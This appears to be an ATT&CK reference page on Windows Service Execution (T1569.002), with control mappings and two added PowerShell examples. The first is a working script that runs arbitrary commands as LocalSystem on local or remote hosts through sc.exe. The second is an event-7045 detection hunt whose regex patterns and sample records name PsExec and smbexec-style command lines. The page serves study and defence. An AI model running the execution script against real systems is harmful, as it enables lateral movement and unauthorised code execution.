Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and Net (<code>net.exe</code>).
PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as PsExec and <code>sc.exe</code> accept a remote computer name as an argument (for example <code>sc.exe \\host create ...</code>), so the same mechanism provides remote execution over SMB/RPC on any host where the caller already holds local administrator rights.
Adversaries may leverage these mechanisms to execute malicious content, either by creating a new service or by modifying the binary path of an existing one and then starting it. This sub-technique is the execution component of service abuse: creating or modifying the service is covered by the Windows Service technique (persistence and privilege escalation), while this sub-technique covers starting it so that the payload runs under the service's configured account, LocalSystem by default.
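The following script is an added example for this page, not code from ATT&CK, Microsoft or Sysinternals. It runs an arbitrary command through the Service Control Manager with <code>sc.exe</code>, locally or on a remote host, which is the primitive that PsExec and its clones build on. It assumes the caller is a local Administrator on the target (needed for <code>SERVICE_CREATE</code> on the SCM) and, for a remote target, that the SCM is reachable over SMB/RPC; the target name, service name and command are illustrative values. Use it only on lab systems you own.

```powershell
# Added example for this page (not ATT&CK's or Sysinternals' code): execute a command through the
# Service Control Manager with sc.exe, the way PsExec-style tooling does. Lab use only.
# Assumptions: the caller is a local Administrator on the target (SERVICE_CREATE on the SCM);
# for a remote target, the SCM is reached over SMB/RPC (TCP 445) and the caller is an admin there.
# $Target, the service name and the command are illustrative values, not taken from the page.
param(
    [string]$Target  = '',                                   # '' = local SCM; '\\FILESRV01' = remote host
    [string]$Name    = 'UpdaterSvc',                         # innocuous-looking service name (assumption)
    [string]$Command = 'whoami /all > C:\Windows\Temp\svc_out.txt'
)

# The SCM expects a real service binary that calls StartServiceCtrlDispatcher. cmd.exe is not one,
# so the SCM waits about 30 s and then reports error 1053, but the command has already executed
# under the service account (LocalSystem by default). Wrapping the payload in %COMSPEC% /c is the
# ImagePath shape that PsExec-style tools and smbexec.py leave behind in the 7045 event.
$binPath = "%COMSPEC% /c $Command"
$scmArgs = @()
if ($Target) { $scmArgs += $Target }                         # "sc.exe \\host <verb> ..." targets a remote SCM

# sc.exe's parser requires the space after each "option=" token; PowerShell quotes $binPath for us
# because it contains spaces, so sc.exe receives it as a single value.
& sc.exe @scmArgs create $Name binPath= $binPath start= demand type= own
if ($LASTEXITCODE -ne 0) { throw "sc create failed: exit code $LASTEXITCODE" }

& sc.exe @scmArgs start $Name | Out-Null
Write-Host "sc start exit code $LASTEXITCODE (1053 is expected: cmd.exe never registered as a service, but the command already ran)"

# Artifacts this leaves for the defender: System log event 7045 (A service was installed) naming the
# ImagePath above, Security event 4697 if 'Audit Security System Extension' is enabled, the
# HKLM\SYSTEM\CurrentControlSet\Services\<Name> key until it is deleted, and on a remote target the
# SMB/RPC session to the SCM. Clean up so the lab host is not left with a dangling service.
& sc.exe @scmArgs delete $Name | Out-Null
```

Save it as a <code>.ps1</code> and run it from an elevated PowerShell; pass <code>-Target '\\HOST'</code> to drive a remote SCM. The point to take from the 1053 error is that a failed <code>sc start</code> is not evidence the payload did not run: the SCM's service-registration timeout fires after the wrapped command has already been executed.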
NIST 800-53 controls

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
CA-07 | Continuous Monitoring | mitigates | T1569.002 | Service Execution | |
CM-06 | Configuration Settings | mitigates | T1569.002 | Service Execution | |
CM-05 | Access Restrictions for Change | mitigates | T1569.002 | Service Execution | |
SI-03 | Malicious Code Protection | mitigates | T1569.002 | Service Execution | |
SI-07 | Software, Firmware, and Information Integrity | mitigates | T1569.002 | Service Execution | |
CM-02 | Baseline Configuration | mitigates | T1569.002 | Service Execution | |
IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1569.002 | Service Execution | |
CM-07 | Least Functionality | mitigates | T1569.002 | Service Execution | |
SI-04 | System Monitoring | mitigates | T1569.002 | Service Execution | |
AC-02 | Account Management | mitigates | T1569.002 | Service Execution | |
AC-03 | Access Enforcement | mitigates | T1569.002 | Service Execution | |
AC-05 | Separation of Duties | mitigates | T1569.002 | Service Execution | |
AC-06 | Least Privilege | mitigates | T1569.002 | Service Execution | |
VERIS enumerations

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
action.hacking.variety.Use of stolen creds | Use of stolen or default authentication credentials (including credential stuffing) | related-to | T1569.002 | Service Execution | |
action.hacking.variety.Abuse of functionality | Abuse of functionality | related-to | T1569.002 | Service Execution | |
action.malware.vector.Direct install | Directly installed or inserted by threat agent (after system access) | related-to | T1569.002 | Service Execution | |
Google Security Operations

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
---|---|---|---|---|---|
google_secops | Google Security Operations | technique_scores | T1569.002 | Service Execution | see Comments |
Comments
Google Security Ops is able to trigger alerts based on command-line arguments and suspicious system processes that could indicate abuse of Windows services to execute malicious commands or code, for example a service installation whose binary path matches <code>*\execute.bat</code>, the batch file that <code>smbexec.py</code> writes by default.
This technique was scored as minimal based on a low or uncertain detection coverage factor.
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/windows/smbexec_py_service_installation.yaral
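The linked rule keys on the service-installation artifact, and the same artifact is what a Windows-native hunt looks at. The following function set is an added example for this page, not the Chronicle rule and not ATT&CK's code: it scores System-log event 7045 ("A service was installed in the system") records for the binary-path shapes that service-execution tooling produces, and includes a live collector built on <code>Get-WinEvent</code>. The sample records at the bottom are constructed for the demo; the service and image paths in them are illustrative, and the <code>BTOBTO</code> name and <code>execute.bat</code> command line mirror the <code>smbexec.py</code> defaults.

```powershell
# Added example for this page (not the Chronicle rule and not ATT&CK's code): hunt event 7045
# records for the ImagePath shapes that Service Execution tooling leaves behind.
# Sample records below are constructed for the demo.

function Test-SuspiciousServiceInstall {
    # Takes projected 7045 records (ServiceName, ImagePath, AccountName, TimeCreated) and emits
    # only those that match at least one indicator, with the reasons attached.
    param([Parameter(ValueFromPipeline)] [psobject]$Record)
    process {
        $path    = [string]$Record.ImagePath
        $reasons = @()
        # A command shell as the service binary: "sc create ... binPath= cmd /c", PsExec clones, smbexec.py
        if ($path -match '(?i)(%COMSPEC%|\\cmd\.exe|^cmd(\.exe)?)\s+/[qc]')            { $reasons += 'command shell as service binary' }
        # smbexec.py's default staging file (the pattern the SecOps rule above keys on)
        if ($path -match '(?i)\\execute\.bat')                                          { $reasons += 'smbexec.py default batch file' }
        # Encoded or hidden PowerShell launched as a service
        if ($path -match '(?i)powershell.*(\s-e(nc(odedcommand)?)?\s|-nop\b|-w(indowstyle)?\s+hidden)') { $reasons += 'encoded/hidden PowerShell' }
        # Service binary dropped in a user-writable location
        if ($path -match '(?i)(\\Temp\\|\\AppData\\|\\Users\\Public\\|\\ProgramData\\)') { $reasons += 'binary in user-writable path' }
        # Service binary loaded from an admin share, i.e. a remote drop-and-run
        if ($path -match '(?i)^\\\\[^\\]+\\(ADMIN\$|C\$)\\')                             { $reasons += 'binary on an admin share' }
        # PsExec's well-known service name (it is user-settable, so absence proves nothing)
        if ($Record.ServiceName -match '(?i)^PSEXESVC$')                                { $reasons += 'PsExec default service name' }
        if ($reasons) {
            [pscustomobject]@{
                Time      = $Record.TimeCreated
                Service   = $Record.ServiceName
                Account   = $Record.AccountName
                ImagePath = $path
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

function Get-ServiceInstallEvent {
    # Live collector: pull 7045 from the System log of a local or remote host and project the
    # EventData fields (ServiceName, ImagePath, ServiceType, StartType, AccountName) into objects.
    param([string]$ComputerName = $env:COMPUTERNAME, [int]$MaxEvents = 500)
    Get-WinEvent -ComputerName $ComputerName -MaxEvents $MaxEvents -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                ServiceName = $d['ServiceName']
                ImagePath   = $d['ImagePath']
                AccountName = $d['AccountName']
            }
        }
}

# Constructed sample (not real telemetry): one benign install, one PsExec-style, one smbexec.py-style.
$sample = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:00:00'; ServiceName = 'DemoAgent'
                       ImagePath = '"C:\Program Files\DemoAgent\agent.exe"'; AccountName = 'LocalSystem' },
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:05:00'; ServiceName = 'PSEXESVC'
                       ImagePath = '%SystemRoot%\PSEXESVC.exe'; AccountName = 'LocalSystem' },
    [pscustomobject]@{ TimeCreated = [datetime]'2024-05-01T09:07:00'; ServiceName = 'BTOBTO'
                       ImagePath = '%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat'
                       AccountName = 'LocalSystem' }
)

$sample | Test-SuspiciousServiceInstall | Format-Table -AutoSize
# Against a live host instead:  Get-ServiceInstallEvent -ComputerName 'FILESRV01' | Test-SuspiciousServiceInstall
```

Run as written, the sample yields two hits: <code>PSEXESVC</code> on its service name, and <code>BTOBTO</code> on both the command-shell and the <code>execute.bat</code> indicators, while <code>DemoAgent</code> is silent. Two caveats for production use: the Security-log counterpart, event 4697, is only written when the "Audit Security System Extension" subcategory is enabled, so do not rely on it without checking the audit policy; and a modified <code>ImagePath</code> on an existing service does not produce 7045 at all, so pair this with monitoring of writes under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>.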